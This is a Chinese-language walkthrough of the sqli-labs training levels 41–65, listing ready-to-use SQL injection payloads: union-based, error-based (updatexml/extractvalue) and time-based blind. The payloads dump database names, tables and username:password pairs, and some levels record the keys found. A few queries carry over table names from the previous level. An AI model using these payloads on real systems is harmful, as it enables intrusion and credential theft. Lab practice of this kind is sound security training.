Less-41
经检测为数字型注入,因为:
?id=1 and 1=1 回显正确
?id=1 and 1=2 回显错误
查询相关数据
?id=-1 union select 1,2,group_concat(schema_name) from information_schema.schemata --+
?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+
?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+
?id=-1 union select 1,2,group_concat(concat_ws(":",username,password)) from users --+
Less-42堆叠或者直接报错
[']
Update 更新数据后,经过 mysql_real_escape_string() 处理的数据存入数据库后不会发生变化,只有在 select 调用的时候才能发挥作用。所以不用考虑在更新密码处进行注入,这关和二次注入的思路是不一样的。
本关从 login.php 源代码中分析可知:
Password 变量在 post 过程中没有经过 mysql_real_escape_string() 函数的处理,
因此可以在密码选项处进行 attack。
登录用户名随意
地址写成:
http://**************/sqli-labs-master/Less-42/login.php
然后查询数据
?login_user=admin&login_password=' and updatexml(1,concat(0x7e,database(),0x7e),1)#
?login_user=admin&login_password=' and updatexml(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata),0x7e),1)#
?login_user=admin&login_password=' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)#
?login_user=admin&login_password=' and updatexml(1,concat(0x7e,(select group_concat(concat_ws(":",username,password)) from users),0x7e),1)#
Less-43
[')]
地址写成:
http://**************/sqli-labs-master/Less-43/login.php
然后查询数据
?login_user=admin&login_password=') and updatexml(1,concat(0x7e,database(),0x7e),1)#
?login_user=admin&login_password=') and updatexml(1,concat(0x7e,version(),0x7e),1)#
?login_user=admin&login_password=') and updatexml(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata),0x7e),1)#
?login_user=admin&login_password=') and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)#
?login_user=admin&login_password=') and updatexml(1,concat(0x7e,(select group_concat(concat_ws(":",username,password)) from users),0x7e),1)#
Less-44
[']
地址写成:
http://**************/sqli-labs-master/Less-44/login.php
然后查询数据
login_user=admin&login_password=' union select 1,group_concat(schema_name),3 from information_schema.schemata#
login_user=admin&login_password=' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()#
login_user=admin&login_password=' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'#
login_user=admin&login_password=' union select 1,group_concat(concat_ws(":",username,password)),3 from users#
Less-45
[')]
地址写成:
http://**************/sqli-labs-master/Less-45/login.php
然后查询数据
login_user=admin&login_password=') union select 1,group_concat(schema_name),3 from information_schema.schemata#
login_user=admin&login_password=') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()#
login_user=admin&login_password=') union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'#
login_user=admin&login_password=') union select 1,group_concat(concat_ws(":",username,password)),3 from users#
Less-46
?sort=1 and extractvalue(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata),0x7e))--+
?sort=1 and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e))--+
?sort=1 and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e))--+
?sort=1 and extractvalue(1,concat(0x7e,(select group_concat(concat_ws(":",username,password)) from users),0x7e))--+
Less-47
[']
?sort=1' and extractvalue(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata),0x7e))--+
?sort=1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e))--+
?sort=1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e))--+
?sort=1' and extractvalue(1,concat(0x7e,(select group_concat(concat_ws(":",username,password)) from users),0x7e))--+
Less-48
?sort=1 and if(length(database())=8,1,sleep(2))--+
?sort=1 and if(substr(database(),1,1)='s',1,sleep(2))--+
?sort=1 and if(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='e',1,sleep(2))--+
?sort=1 and if(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1)='u',1,sleep(2))--+
?sort=1 and if(substr((select group_concat(username,password) from security.users limit 0,1),1,1)='d',1,sleep(2))--+
Less-49
[']
?sort=1' and if(length(database())=8,1,sleep(2))--+
?sort=1' and if(substr(database(),1,1)='s',1,sleep(2))--+
?sort=1' and if(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='e',1,sleep(2))--+
?sort=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1)='u',1,sleep(2))--+
?sort=1' and if(substr((select group_concat(username,password) from security.users limit 0,1),1,1)='d',1,sleep(2))--+
Less-50
?sort=1 and updatexml(1,concat(0x7e,database(),0x7e),1)#
?sort=1 and updatexml(1,concat(0x7e,version(),0x7e),1)#
?sort=1 and updatexml(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata),0x7e),1)#
?sort=1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)#
?sort=1 and updatexml(1,concat(0x7e,(select group_concat(concat_ws(":",username,password)) from users),0x7e),1)#
Less-51
[']
?sort=1' and extractvalue(1,concat(0x7e,database()))--+
?sort=1' and extractvalue(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata)))--+
?sort=1' and extractvalue(1,concat(0x7e,(select group_concat(concat_ws(":",username,password)) from users)))--+
?sort=1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users')))--+
?sort=1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())))--+
Less-52
?sort=1 and if(length(database())=8,1,sleep(2))--+
?sort=1 and if(substr(database(),1,1)='s',1,sleep(2))--+
?sort=1 and if(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='e',1,sleep(2))--+
?sort=1 and if(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1)='u',1,sleep(2))--+
?sort=1 and if(substr((select group_concat(username,password) from security.users limit 0,1),1,1)='d',1,sleep(2))--+
Less-53
[']
?sort=1' and if(length(database())=8,1,sleep(2))--+
?sort=1' and if(substr(database(),1,1)='s',1,sleep(2))--+
?sort=1' and if(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='e',1,sleep(2))--+
?sort=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1)='u',1,sleep(2))--+
?sort=1' and if(substr((select group_concat(username,password) from security.users limit 0,1),1,1)='d',1,sleep(2))--+
Less-54
测试显示位
?id=1' order by 3 --+ // True
?id=1' order by 4 --+ // false
获取库名
?id=0' union select 1,2,database()--+ // True challenges
获取表名
?id=0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+//sr2765z6ma
获取列名
?id=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='sr2765z6ma'--+//secret_FQHN
获取key
?id=0' union select 1,2,group_concat(secret_FQHN) from sr2765z6ma--+//OtS4hf7GK9E5r36zPaaxYT2S
Less-55
测试显示位
?id=1) order by 3 --+ // True
?id=1) order by 4 --+ // false
获取库名
?id=0) union select 1,2,database()--+ // True challenges
获取表名
?id=0) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+//ngezf8m9e8
获取列名
?id=0) union select 1,2,group_concat(column_name) from information_schema.columns where table_name='sr2765z6ma'--+//secret_C41J
获取key
?id=0) union select 1,2,group_concat(secret_FQHN) from sr2765z6ma--+//eIBeUMWtx2vimfrFC6I3tghF
Less-55 与 Less-54 的不同在于 id 参数的闭合符号为 ( )
database:challenges
table_name:ngezf8m9e8
column_name:secret_C41J
key:eIBeUMWtx2vimfrFC6I3tghF
Less-56
?id=1') order by 3 --+ // True
?id=1) order by 4 --+ // false
获取库名
?id=0') union select 1,2,database()--+ // True challenges
获取表名
?id=0') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+//0l7axruw24
获取列名
?id=0') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='0l7axruw24'--+//secret_Q0T4
获取key
?id=0') union select 1,2,group_concat(secret_Q0T4) from 0l7axruw24--+//nfrdtsnM0jL8iwqR6iAGnnc2
Less-56 的闭合符号为 ('')
Less-57
?id=1" order by 3 --+ // True
?id=1" order by 4 --+ // false
获取库名
?id=0" union select 1,2,database()--+ // True challenges
获取表名
?id=0" union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+//udekem1a8m
获取列名
?id=0" union select 1,2,group_concat(column_name) from information_schema.columns where table_name='udekem1a8m'--+//secret_DR1P
获取key
?id=0" union select 1,2,group_concat(secret_DR1P) from udekem1a8m--+//jvwbKcrsVpvGG7r72crHote5
Less-57 的闭合符号为 ""
Less-58
获取数据库
?id=1' and updatexml(1,concat(0x7e,(database()),0x7e),1)--+
获取表名
?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) --+//oilntvhrkv
获取列名
?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='oilntvhrkv'),0x7e),1)--+//secret_NJQI
获取key
?id=1' and updatexml(1,concat(0x7e,(select group_concat(secret_NJQI) from oilntvhrkv),0x7e),1)--+
edX6kT5tSgbCrTu0XXNmb8oU
#Less-59
获取数据库
?id=1 and updatexml(1,concat(0x7e,(database()),0x7e),1)
获取表名
?id=1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) //8nol5dwme6
获取列名
?id=1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='8nol5dwme6'),0x7e),1)//secret_UW3B
获取key
?id=1 and updatexml(1,concat(0x7e,(select group_concat(secret_UW3B) from 8nol5dwme6),0x7e),1)//
CKhOaaZqhX9HudYu2rNSRfh9
Less-60
获取数据库
?id=1") and updatexml(1,concat(0x7e,(database()),0x7e),1)--+
获取表名
?id=1") and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) --+//voywesi82a
获取列名
?id=1") and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='voywesi82a'),0x7e),1)--+//secret_0TB
获取key
?id=1") and updatexml(1,concat(0x7e,(select group_concat(secret_0TBA) from voywesi82a),0x7e),1)--+
WP1I1arba3hhwA0fJlk7PCO8
Less-61
获取数据库
?id=1')) and updatexml(1,concat(0x7e,(database()),0x7e),1)--+
获取表名
?id=1')) and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) --+//34tjqs4pst
获取列名
?id=1')) and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='34tjqs4pst'),0x7e),1)--+//secret_Y4WV
获取key
?id=1')) and updatexml(1,concat(0x7e,(select group_concat(secret_Y4WV) from 34tjqs4pst),0x7e),1)--+
b9156yzOgwluB2xKyjftrySK
Less-62
经检测
?id=1') and ('1')=('2 回显不正确
?id=1') and ('1')=(' 回显正确
说明是 [')] 类型,
而且无报错,所以使用延时注入
?id=1') and If(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1)='3',1,sleep(5))-- +//y6q9japcwx
?id=1') and if(substr((select group_concat(column_name) from information_schema.columns where table_name='34tjqs4pst'),1,1)='i',1,sleep(3))--+//secret_YQFI
?id=1') and if(substr((select group_concat(secret_YQFI) from y6q9japcwx limit 0,1),1,1)='S',1,sleep(3))--+//SXpv3ffqjFg940EI999FbPlT
Less-63
类型为[']
其余同Less-62
Less-64
类型为[))]
其余同Less-62
Less-65
类型为[")]
其余同Less-62